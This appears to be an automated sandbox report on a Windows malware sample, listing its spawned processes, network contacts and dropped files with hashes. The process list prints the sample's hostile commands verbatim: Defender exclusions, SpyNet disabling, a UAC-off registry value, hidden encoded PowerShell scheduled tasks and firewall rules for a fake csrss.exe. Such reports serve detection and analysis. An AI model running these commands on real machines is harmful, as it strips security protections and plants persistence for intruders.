| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe
"C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ed11cc480d00d3cc295fb67628c51bf406b0dfd41bc6cdd4bc594020c4689fae.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\Pictures\JKmxMN5yf0G2zr5mnTHQQ9Fl.exe
"C:\Users\Admin\Pictures\JKmxMN5yf0G2zr5mnTHQQ9Fl.exe"
C:\Users\Admin\Pictures\o0fUweQaCmP5EETHVw9DPj7B.exe
"C:\Users\Admin\Pictures\o0fUweQaCmP5EETHVw9DPj7B.exe"
C:\Users\Admin\Pictures\4bUKiDXk0lDQoPl3ZL2UDwUm.exe
"C:\Users\Admin\Pictures\4bUKiDXk0lDQoPl3ZL2UDwUm.exe"
C:\Users\Admin\Pictures\XSX7m3JwRIZEHyt8F6miZR9p.exe
"C:\Users\Admin\Pictures\XSX7m3JwRIZEHyt8F6miZR9p.exe"
C:\Users\Admin\Pictures\7pGISczfho5bZU7Ugq67fpTp.exe
"C:\Users\Admin\Pictures\7pGISczfho5bZU7Ugq67fpTp.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2028 -ip 2028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 880
C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe
"C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe" --silent --allusers=0
C:\Users\Admin\Pictures\aGmWABia79Ul6yjhtbj0YJko.exe
"C:\Users\Admin\Pictures\aGmWABia79Ul6yjhtbj0YJko.exe"
C:\Users\Admin\AppData\Local\Temp\u264.0.exe
"C:\Users\Admin\AppData\Local\Temp\u264.0.exe"
C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe
C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f06e1a8,0x6f06e1b4,0x6f06e1c0
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2FDG3Uz2HcN4eMaRazINv0Mm.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2FDG3Uz2HcN4eMaRazINv0Mm.exe" --version
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3308 -ip 3308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 532
C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe
"C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3100 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328125913" --session-guid=aa38fcb3-440d-493d-9258-305a99486b8a --server-tracking-blob=MjBjYzA0NGVlNTM4MmU4YzkwNzY0NjZhYjU4MmU5NWRlYjNiYjFlNmQyNDhkYTlhNjkyZjI2NTg5ZmU4ZGEwYTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzA3NDEuNzYyNiIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImVmMGJhZDJlLWU3YjMtNDVjMC1hMzA2LTlmNWQ4YWQ0NWZiZCJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000
C:\Users\Admin\Pictures\Zs7JzICiQb8rN1LWDoq1oFuC.exe
"C:\Users\Admin\Pictures\Zs7JzICiQb8rN1LWDoq1oFuC.exe"
C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe
C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6de7e1a8,0x6de7e1b4,0x6de7e1c0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3308 -ip 3308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 528
C:\Users\Admin\AppData\Local\Temp\7zSD590.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\NR6gaELRwoSWDVryNisRji2u.exe
"C:\Users\Admin\Pictures\NR6gaELRwoSWDVryNisRji2u.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\AppData\Local\Temp\7zSF1B3.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSEF80.tmp\Install.exe
.\Install.exe /WZFcdidyRl "385118" /S
C:\Users\Admin\AppData\Local\Temp\7zSFA3E.tmp\Install.exe
.\Install.exe /WZFcdidyRl "385118" /S
C:\Users\Admin\AppData\Local\Temp\u264.1.exe
"C:\Users\Admin\AppData\Local\Temp\u264.1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2812 -ip 2812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 1164
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\chcp.com
chcp 1251
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gVRejLxWp" /SC once /ST 10:32:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gVRejLxWp" /SC once /ST 10:32:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gVRejLxWp"
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gVRejLxWp"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\o0fUweQaCmP5EETHVw9DPj7B.exe
"C:\Users\Admin\Pictures\o0fUweQaCmP5EETHVw9DPj7B.exe"
C:\Users\Admin\Pictures\4bUKiDXk0lDQoPl3ZL2UDwUm.exe
"C:\Users\Admin\Pictures\4bUKiDXk0lDQoPl3ZL2UDwUm.exe"
C:\Users\Admin\Pictures\XSX7m3JwRIZEHyt8F6miZR9p.exe
"C:\Users\Admin\Pictures\XSX7m3JwRIZEHyt8F6miZR9p.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gVRejLxWp"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gVRejLxWp"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\VeJLpCR.exe\" id /OOsite_idEEn 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\VeJLpCR.exe\" id /OOsite_idEEn 385118 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0xd20040,0xd2004c,0xd20058
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| US | 8.8.8.8:53 | sty.ink | udp |
| RU | 193.233.132.175:80 | 193.233.132.175 | tcp |
| US | 8.8.8.8:53 | namemail.org | udp |
| US | 8.8.8.8:53 | cu82342.tw1.ru | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 104.21.13.170:443 | sty.ink | tcp |
| US | 104.21.13.170:443 | sty.ink | tcp |
| US | 172.67.152.98:443 | shipofdestiny.com | tcp |
| US | 172.67.152.98:443 | shipofdestiny.com | tcp |
| US | 104.21.15.5:443 | operandotwo.com | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| RU | 176.57.210.144:443 | cu82342.tw1.ru | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | 170.13.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.152.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.15.21.104.in-addr.arpa | udp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 172.67.173.167:443 | guseman.org | tcp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| DE | 185.172.128.65:80 | 185.172.128.65 | tcp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| DE | 185.172.128.209:80 | 185.172.128.209 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 185.26.182.94:443 | features.opera-api2.com | tcp |
| NL | 185.26.182.117:443 | download.opera.com | tcp |
| US | 104.18.10.89:443 | download5.operacdn.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| GB | 95.101.143.243:443 | download3.operacdn.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
Files
memory/1792-0-0x0000024963D80000-0x0000024963D8C000-memory.dmp
memory/1792-1-0x00007FFEAC6E0000-0x00007FFEAD1A2000-memory.dmp
memory/1792-2-0x000002497E390000-0x000002497E3A0000-memory.dmp
memory/1792-3-0x00000249008E0000-0x000002490093E000-memory.dmp
memory/2016-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/348-5-0x0000023EE2FC0000-0x0000023EE2FE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nc3inxor.vz2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/348-14-0x00007FFEAC6E0000-0x00007FFEAD1A2000-memory.dmp
memory/348-15-0x0000023EFB450000-0x0000023EFB460000-memory.dmp
memory/2016-16-0x0000000074410000-0x0000000074BC1000-memory.dmp
memory/348-17-0x0000023EFB450000-0x0000023EFB460000-memory.dmp
memory/348-18-0x0000023EFB450000-0x0000023EFB460000-memory.dmp
memory/2016-21-0x0000000005360000-0x0000000005370000-memory.dmp
memory/348-22-0x00007FFEAC6E0000-0x00007FFEAD1A2000-memory.dmp
memory/1792-23-0x00007FFEAC6E0000-0x00007FFEAD1A2000-memory.dmp
C:\Users\Admin\Pictures\FkpJz6UarxCcXJYc80rpoMH9.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\JKmxMN5yf0G2zr5mnTHQQ9Fl.exe
| MD5 | c17df3b36319b6b84e52bdce820abf10 |
| SHA1 | eea9d0ffcf2112b098bc2cca88d2011f466298ec |
| SHA256 | 37681e9a5d6ab77924f9b43c5f717ff63cc5bece2116c05bd382089f22137157 |
| SHA512 | b08936a50a618ef03c4367b442febe400193ddfd9e033009b00e8823aad1f68d38415624f4a22144ce9cd12d68dd52ffbfd9e1e5e8c2d2c13f1e3312c9dc68df |
C:\Users\Admin\Pictures\o0fUweQaCmP5EETHVw9DPj7B.exe
| MD5 | 808a710a267e8394e802281380ca0b59 |
| SHA1 | 151555028550b912c0bef786fe1b99e3437dde72 |
| SHA256 | 31fa6769cb32f90dfa2809349040c227bd88f3a553bc50915656f60863b86f34 |
| SHA512 | bfcdc6e2f429569b0ebf4bf8e1592ed28f85467a90554d7796c11f4e8aebc0ab409be9dd75189a25c2fa988534c1be6eb073dfec7637c6c4b58c11a7ad3b3a25 |
memory/2812-63-0x0000000000C30000-0x0000000000D30000-memory.dmp
memory/2812-65-0x0000000002820000-0x000000000288E000-memory.dmp
memory/2812-71-0x0000000000400000-0x0000000000B0E000-memory.dmp
C:\Users\Admin\Pictures\XSX7m3JwRIZEHyt8F6miZR9p.exe
| MD5 | db2472ac77f8643d97782704e54c19dc |
| SHA1 | 0c618c3f12f5bbe4983431210f9148e58a5f965b |
| SHA256 | 9100d2cfcd9248cfc577a35519d108146f0358e81ba15432544f76b7113951b1 |
| SHA512 | dbffd3e0f20e2835735f65f665f491ac9da0ceeaff6441364d8514c75bd635ce4c99dc7d3fcf96ecbbbd7460d8bbee5e6e3bfb953ce43a8be496f1c9121c50c2 |
memory/4060-94-0x0000000002CD0000-0x00000000030CC000-memory.dmp
memory/4060-95-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2016-96-0x0000000074410000-0x0000000074BC1000-memory.dmp
memory/4060-97-0x00000000030D0000-0x00000000039BB000-memory.dmp
C:\Users\Admin\Pictures\7pGISczfho5bZU7Ugq67fpTp.exe
| MD5 | 7960d8afbbac06f216cceeb1531093bb |
| SHA1 | 008221bf66a0749447cffcb86f2d1ec80e23fc76 |
| SHA256 | f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84 |
| SHA512 | 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147 |
memory/1860-111-0x0000000002AD0000-0x0000000002ECC000-memory.dmp
memory/1860-112-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2028-113-0x0000000074410000-0x0000000074BC1000-memory.dmp
memory/872-114-0x0000000002C70000-0x000000000306C000-memory.dmp
memory/872-115-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2028-116-0x0000000000130000-0x000000000019E000-memory.dmp
memory/3308-119-0x0000000000400000-0x000000000046D000-memory.dmp
memory/3308-123-0x0000000000400000-0x000000000046D000-memory.dmp
memory/2028-122-0x0000000004BE0000-0x0000000004BF0000-memory.dmp
memory/2028-125-0x0000000002500000-0x0000000004500000-memory.dmp
memory/3308-126-0x0000000000400000-0x000000000046D000-memory.dmp
C:\Users\Admin\Pictures\2FDG3Uz2HcN4eMaRazINv0Mm.exe
| MD5 | 886e5079e4a78927fe60ebfa27c5cbba |
| SHA1 | cb0ef35bd0c5112492a2e80aeaa580f2e04b4bda |
| SHA256 | d4367b796b5667de7ef49f081508fcda4614d046d86994bd69e151e0440c4e9e |
| SHA512 | 307975f8c61eeef8530cf7310cb790b2beaa92cf45525bf54df15cfaf5d7cd85abba2be053bc421adb8dbe4328fac307bcec0a6df12c2f11c32e1bacd22b2739 |
C:\Users\Admin\Pictures\aGmWABia79Ul6yjhtbj0YJko.exe
| MD5 | 4204b9d4c4df5c4b4d67922db24f342a |
| SHA1 | 9255b5e94028f3f55adda2576d60bd39452eaf08 |
| SHA256 | 62cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414 |
| SHA512 | 0b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423 |
memory/2780-149-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403281259100213100.dll
| MD5 | 2c8ab707b79399f1cbaf2cd17003d614 |
